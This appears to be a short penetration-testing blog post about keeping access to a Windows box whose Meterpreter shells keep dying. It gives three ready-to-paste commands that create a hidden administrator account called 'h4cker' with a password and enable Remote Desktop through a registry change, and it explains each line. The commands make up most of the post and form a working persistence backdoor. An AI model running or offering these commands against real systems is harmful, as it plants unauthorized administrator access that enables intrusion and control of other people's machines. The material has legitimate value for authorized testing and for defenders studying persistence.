Meterpreter session 1 closed. Reason: Died

    Get a shell, lose a shell, get a shell, lose a shell.  That's basically what was happening while attacking this one particular box.  I'd get a shell and moments later my shell would close on me.  I had just enough time to drop into a command line but, poof, then it was gone.

    I thought about it for a minute and realized there was enough time to cut and paste something into that command line.  I prepared this in notepad for my copy and paste:

    net user h4cker p4sswurd! /add
    net localgroup administrators h4cker /add
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    The first line adds a user:  h4cker and sets the password:  p4sswurd!
    The next line adds the user into the local administrators group.
    The final line enables remote desktop (RDP).

    Now when I get my shell, I drop to a command line, cut & paste the above from notepad, the shells closes but I have an admin account and RDP access.

    © 2020